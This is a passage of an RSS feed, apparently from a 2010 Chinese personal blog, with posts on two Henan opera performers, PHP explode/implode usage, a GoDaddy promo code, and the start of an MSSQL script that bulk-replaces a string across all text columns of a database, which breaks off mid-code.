<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet href='http://feed.lixiaopeng.org/styles/podcast2.xsl' type='text/xsl' ?><!--这是一个由Feedsy提供技术支持的Feed，为了提高读者阅读的体验，以及满足用户美化自己Feed的需要，我们设计了多种精美的Feed模板，提供给大家选择，所有最终呈现出来的样式，皆由用户自愿选择使用，未经许可，任何团体和个人，请不要擅自修改样式或者盗用，这是对于用户选择权的尊重。--><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:fs="http://www.feedsky.com/namespace/feed" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><atom:link href="http://feed.lixiaopeng.org" type="application/rss+xml" rel="self"></atom:link><fs:self_link href="http://feed.feedsky.com/Lixiaopeng" type="application/rss+xml"></fs:self_link><lastBuildDate>Wed, 14 Jul 2010 21:19:28 GMT</lastBuildDate><title>Lixiaopeng's blog</title><description>My Home!</description><image><url>http://www.feedsky.com/feed/Lixiaopeng/sc/gif</url><title>Lixiaopeng's blog</title><link>http://www.lixiaopeng.org</link></image><link>http://www.lixiaopeng.org</link><sy:updatePeriod>hourly</sy:updatePeriod><sy:updateFrequency>1</sy:updateFrequency><language>en</language><pubDate>Sat, 21 Aug 2010 03:28:21 GMT</pubDate><item><title>赵辉和朱坤芳 豫剧两位红脸王</title><link>http://www.lixiaopeng.org/zhao-hui-wang-and-zhu-kunfang-opera-2-cop/</link><content:encoded>&lt;p&gt;嘿嘿，跟超哥去虞城玩，认识了这两位老哥赵辉和朱坤芳，赵辉被人称为红脸怪五，而朱坤芳被人称为红脸王，虽然我对戏曲不是很懂，不过不管在戏台上还是饭桌上，两位老哥哥给我的感觉都是非常的好，对戏曲的非常的热爱，非常的义气，和蔼好相处。。。&lt;br /&gt;
嘿嘿，偶帮他们去发了一下&lt;a href=&quot;http://www.baidu.com&quot;  class=&quot;alinks_links&quot; onclick=&quot;return alinks_click(this);&quot; title=&quot;&amp;#30334;&amp;#24230;&quot;  style=&quot;padding-right: 13px; background: url(http://www.lixiaopeng.org/wp-content/plugins/alinks/images/external.png) center right no-repeat;&quot; rel=&quot;external&quot;&gt;百度&lt;/a&gt;的词条。。&lt;/p&gt;
&lt;p&gt;赵辉：豫剧红脸王第三代传人，杨启超的弟子，被人誉为豫东红脸怪王。演唱剧目：⑴、《反徐州》【堂口】一折；⑵、《火烧纪信》一折。&lt;br /&gt;
赵辉。人送外号：红脸怪王。河南虞城人，国家一级演员。豫东唐门第三代传人，杨启超亲传弟子。曾在1990年商丘地区汇演中演唱（反徐州）获得一等奖。&lt;br /&gt;
现在，河南省‘红脸王’豫剧团担任主要演员。&lt;br /&gt;
所谓人怪艺更怪,精彩真不赖,行韵流水情,舞台展异彩&lt;/p&gt;
&lt;p&gt;朱坤芳：八大豫剧红脸王之称的青年演员，唐玉成的三代传人，杨启超弟子。演唱剧目：⑴、《两狼山》选段；⑵、和曹君秋联合演出《刘庸下南京》【抢棺材】一折。&lt;br /&gt;
朱坤芳出身于梨园之家，他的父亲朱瑞杰先生就是当年红脸王唐玉成教导的弟子。朱坤芳毕业于商丘戏校，自幼就开始和红脸王开山鼻祖唐玉成大师的大弟子奶师李克让学习，后来到红脸王唐玉成的虞城县豫剧团拜师杨启超．最后，又和＂白三＂＂白四＂学习发音唱腔，行成独特的风韵，如他在＜杨家将＞中的唱段在他老师杨启超的基础上又加以创新：发出大本和二本强强结合，从而形成了独特的韵味。他的＜火烧纪信＞＜ 泗水王＞＜ 哭头＞＜ 反徐州＞ 等这些哭戏更是精妙绝伦。&lt;br /&gt;
朱坤芳是 红脸王祖师唐玉成的三代传人， 杨启超是老师， 李克让是奶师．&lt;br /&gt;
唐门最有名气的二代传人是这些：杨启超　 刘玉龙 朱勤堂 潘玉成 汪振堂 白三 白四 李克让 等。&lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;No Related Post&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186603/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/zhao-hui-wang-and-zhu-kunfang-opera-2-cop/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186603/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186603/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/zhao-hui-wang-and-zhu-kunfang-opera-2-cop/feed/</wfw:commentRss><slash:comments>1</slash:comments><description>嘿嘿，跟超哥去虞城玩，认识了这两位老哥赵辉和朱坤芳，赵辉被人称为红脸怪五，而朱坤芳被人称为红脸王，虽然我对戏曲不是很懂，不过不管在戏台上还是饭桌上，两位老哥哥给我的感觉都是非常的好，对戏曲的非常的热爱，非常的义气，和蔼好相处。。。
嘿嘿，偶帮他们去发了一下百度的词条。。
赵辉：豫剧红脸王第三代传人，杨启超的弟子，被人誉为豫东红脸怪王。演唱剧目：⑴、《反徐州》【堂口】一折；⑵、《火烧纪信》一折。
赵辉。人送外号：红脸怪王。河南虞城人，国家一级演员。豫东唐门第三代传人，杨启超亲传弟子。曾在1990年商丘地区汇演中演唱（反徐州）获得一等奖。
现在，河南省‘红脸王’豫剧团担任主要演员。
所谓人怪艺更怪,精彩真不赖,行韵流水情,舞台展异彩
朱坤芳：八大豫剧红脸王之称的青年演员，唐玉成的三代传人，杨启超弟子。演唱剧目：⑴、《两狼山》选段；⑵、和曹君秋联合演出《刘庸下南京》【抢棺材】一折。
朱坤芳出身于梨园之家，他的父亲朱瑞杰先生就是当年红脸王唐玉成教导的弟子。朱坤芳毕业于商丘戏校，自幼就开始和红脸王开山鼻祖唐玉成大师的大弟子奶师李克让学习，后来到红脸王唐玉成的虞城县豫剧团拜师杨启超．最后，又和＂白三＂＂白四＂学习发音唱腔，行成独特的风韵，如他在＜杨家将＞中的唱段在他老师杨启超的基础上又加以创新：发出大本和二本强强结合，从而形成了独特的韵味。他的＜火烧纪信＞＜ 泗水王＞＜ 哭头＞＜ 反徐州＞ 等这些哭戏更是精妙绝伦。
朱坤芳是 红脸王祖师唐玉成的三代传人， 杨启超是老师， 李克让是奶师．
唐门最有名气的二代传人是这些：杨启超　 刘玉龙 朱勤堂 潘玉成 汪振堂 白三 白四 李克让 等。
您可能对以下文章有兴趣↓No Related Post&lt;img src=&quot;http://www1.feedsky.com/t1/405186603/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/zhao-hui-wang-and-zhu-kunfang-opera-2-cop/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186603/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186603/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>赵辉</category><category>杨启超</category><category>豫剧</category><category>唐玉成</category><category>朱坤芳</category><category>随笔</category><pubDate>Thu, 15 Jul 2010 05:19:28 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/zhao-hui-wang-and-zhu-kunfang-opera-2-cop/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1379</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/zhao-hui-wang-and-zhu-kunfang-opera-2-cop/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186603/5236324</fs:itemid></item><item><title>PHP 数组和字符串互相转换</title><link>http://www.lixiaopeng.org/php-arrays-and-strings-interchangeable/</link><content:encoded>&lt;p&gt;PHP 中由于数组和字符串这两种变量类型是如此常用，以至于 PHP 具有两个函数，可以在字符串和数组之间互相进行转换。&lt;br /&gt;
　　$array=explode(separator,$string);&lt;br /&gt;
　　$string=implode(glue,$array);&lt;br /&gt;
　　使用和理解这两个函数的关键之处是分隔符（separator）和胶合符（glue）关系。当把一个数组转换成一个字符串时，将会设置胶合符——将被插入到生成字符串中的数组值之间的字符或代码。相反，当把字符串转换成数组时，要指定分隔符，它用于标记什么应该变成独立数组元素。例如，以字符串开始：&lt;br /&gt;
　　$s1=’Mon-Tue-Wed-Thu-Fri’;&lt;br /&gt;
　　$days_array=explode(’-',$s1);&lt;br /&gt;
　　$days_array 变量现在是一个有5个元素的数组，其元素 Mon 的索引为0，Tue 的索引为1，等等。&lt;br /&gt;
　　$s2=implode(’,',$days_array);&lt;br /&gt;
　　$s2 变量现在是一个用逗号分隔的一个星期中各天的列表：Mon,Tue,Wed,Thu,Fri&lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dvbbs-php2-0-injection-vulnerability/&quot; title=&quot;DVBBS php2.0 注入漏洞&quot;&gt;DVBBS php2.0 注入漏洞&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/sql-injection-in-php/&quot; title=&quot;PHP的SQL注入&quot;&gt;PHP的SQL注入&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/a-php-programming-mistakes/&quot; title=&quot;PHP编程的一种失误&quot;&gt;PHP编程的一种失误&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/php/&quot; title=&quot;PHP &lt;= 5.2.9 SafeMod Bypass Vulnerability &quot;&gt;PHP &lt;= 5.2.9 SafeMod Bypass Vulnerability &lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/when-magic_quotes_gpc-off/&quot; title=&quot;当magic_quotes_gpc=off&quot;&gt;当magic_quotes_gpc=off&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/magic_quotes_sybase-and-magic_quotes_gpc/&quot; title=&quot;magic_quotes_sybase and magic_quotes_gpc&quot;&gt;magic_quotes_sybase and magic_quotes_gpc&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/tinyurl-api-using-the-php-method-call/&quot; title=&quot;使用PHP调用TinyURL API的方法&quot;&gt;使用PHP调用TinyURL API的方法&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/mystery-of-php-security-php-undergroud-security/&quot; title=&quot;php安全之谜(PHP Undergroud Security)&quot;&gt;php安全之谜(PHP Undergroud Security)&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/php-google-hack-keywords/&quot; title=&quot;php google hack 关键字&quot;&gt;php google hack 关键字&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/produced-by-a-static-php-site-template-framework/&quot; title=&quot;用PHP制作静态网站的模板框架&quot;&gt;用PHP制作静态网站的模板框架&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186604/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/php-arrays-and-strings-interchangeable/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186604/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186604/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/php-arrays-and-strings-interchangeable/feed/</wfw:commentRss><slash:comments>2</slash:comments><description>PHP 中由于数组和字符串这两种变量类型是如此常用，以至于 PHP 具有两个函数，可以在字符串和数组之间互相进行转换。
　　$array=explode(separator,$string);
　　$string=implode(glue,$array);
　　使用和理解这两个函数的关键之处是分隔符（separator）和胶合符（glue）关系。当把一个数组转换成一个字符串时，将会设置胶合符——将被插入到生成字符串中的数组值之间的字符或代码。相反，当把字符串转换成数组时，要指定分隔符，它用于标记什么应该变成独立数组元素。例如，以字符串开始：
　　$s1=’Mon-Tue-Wed-Thu-Fri’;
　　$days_array=explode(’-',$s1);
　　$days_array 变量现在是一个有5个元素的数组，其元素 Mon 的索引为0，Tue 的索引为1，等等。
　　$s2=implode(’,',$days_array);
　　$s2 变量现在是一个用逗号分隔的一个星期中各天的列表：Mon,Tue,Wed,Thu,Fri
您可能对以下文章有兴趣↓DVBBS php2.0 注入漏洞PHP的SQL注入PHP编程的一种失误PHP&lt;img src=&quot;http://www1.feedsky.com/t1/405186604/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/php-arrays-and-strings-interchangeable/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186604/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186604/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>数组</category><category>字符串</category><category>explode</category><category>PHP</category><category>implode</category><pubDate>Fri, 18 Jun 2010 08:04:31 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/php-arrays-and-strings-interchangeable/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1377</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/php-arrays-and-strings-interchangeable/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186604/5236324</fs:itemid></item><item><title>续费.Org 域名Godaddy优惠码</title><link>http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/</link><content:encoded>&lt;p&gt;EMFB7&lt;br /&gt;
支付总价： $7.49美元+0.18税 = $7.67美元&lt;br /&gt;
到期时间：未知&lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/domestic-domain-name-registration-service-to-stop-individuals-with-access-to/&quot; title=&quot;国内域名注册服务停止对个人开放&quot;&gt;国内域名注册服务停止对个人开放&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/live-domains-at-godaddycom-create-mx-dns-srv-records/&quot; title=&quot;Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录&quot;&gt;Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/switch-off-automatically-renew-godaddy/&quot; title=&quot;关掉Godaddy自动续费&quot;&gt;关掉Godaddy自动续费&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/godaddy-domain-name-into-lixiaopengorg-success/&quot; title=&quot;域名lixiaopeng.org成功转入Godaddy&quot;&gt;域名lixiaopeng.org成功转入Godaddy&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/lixiaopengorg-apply-to-transfer-to-the-godaddy/&quot; title=&quot;lixiaopeng.org申请转入GODADDY了&quot;&gt;lixiaopeng.org申请转入GODADDY了&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186605/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186605/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186605/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/feed/</wfw:commentRss><slash:comments>1</slash:comments><description>EMFB7
支付总价： $7.49美元+0.18税 = $7.67美元
到期时间：未知
您可能对以下文章有兴趣↓国内域名注册服务停止对个人开放Live Domains在GoDaddy.com 创建 MX/DNS/SRV 记录关掉Godaddy自动续费域名lixiaopeng.org成功转入Godaddylixiaopeng.org申请转入GODADDY了&lt;img src=&quot;http://www1.feedsky.com/t1/405186605/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186605/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186605/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>GODADDY</category><category>优惠码</category><category>其它</category><category>.Org</category><category>续费</category><pubDate>Fri, 04 Jun 2010 12:49:41 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/renewals-org-domain-names-godaddy-promo-code/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186605/5236324</fs:itemid></item><item><title>mssql批量替换整个数据库</title><link>http://www.lixiaopeng.org/mssql-bulk-replacement-of-the-entire-database/</link><content:encoded>&lt;div class=&quot;wp_syntax&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre class=&quot;sql&quot; style=&quot;font-family:monospace;&quot;&gt;declare @Str1 varchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;8000&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;
&lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; @Str1&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'参数1'&lt;/span&gt;
declare @Str2 varchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;8000&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;
&lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; @Str2&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'参数2'&lt;/span&gt;
&amp;nbsp;
&amp;nbsp;
&lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; nocount &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;ON&lt;/span&gt;
&amp;nbsp;
&amp;nbsp;
declare @tableName nvarchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;100&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@columnName nvarchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;100&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@tbID int&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@iRow int&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@iResult int
declare @sql nvarchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;500&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;
&amp;nbsp;
&amp;nbsp;
&lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; @iResult&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;
declare cur cursor &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FOR&lt;/span&gt;
&lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SELECT&lt;/span&gt; name&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;id &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FROM&lt;/span&gt; sysobjects &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;WHERE&lt;/span&gt; xtype&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'U'&lt;/span&gt;
&amp;nbsp;
&amp;nbsp;
open cur
fetch next &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FROM&lt;/span&gt; cur &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;INTO&lt;/span&gt; @tableName&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@tbID
&amp;nbsp;
&amp;nbsp;
while @@fetch_status&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;
begin
declare cur1 cursor &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FOR&lt;/span&gt;
        &lt;span style=&quot;color: #808080; font-style: italic;&quot;&gt;--xtype in (231,167,239,175,99) 为char,varchar,nchar,nvarchar,ntext类型&lt;/span&gt;
        &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SELECT&lt;/span&gt; name &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FROM&lt;/span&gt; syscolumns &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;WHERE&lt;/span&gt; xtype &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;IN&lt;/span&gt; &lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;231&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;167&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;239&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;175&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;99&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;AND&lt;/span&gt; id&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;@tbID
open cur1
fetch next &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FROM&lt;/span&gt; cur1 &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;INTO&lt;/span&gt; @columnName
while @@fetch_status&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;
begin
      &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; @sql&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'update ['&lt;/span&gt; &lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt; @tableName &lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt; &lt;span style=&quot;color: #ff0000;&quot;&gt;'] set ['&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt; @columnName &lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;']= replace(cast(['&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@columnName&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'] as varchar(8000)),'&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@Str1&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;','&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@Str2&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;') where ['&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@columnName&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'] like '&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'%'&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@Str1&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'%'&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;''&lt;/span&gt; 
      &lt;span style=&quot;color: #808080; font-style: italic;&quot;&gt;--update tablename set fieldA=replace(cast(fieldA as varchar(8000)) ,'aa','bb')这样的语句。&lt;/span&gt;
      exec sp_executesql @sql     
      &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; @iRow&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;@@rowcount
      &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; @iResult&lt;span style=&quot;color: #66cc66;&quot;&gt;=&lt;/span&gt;@iResult&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@iRow
      &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;IF&lt;/span&gt; @iRow&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;
      begin
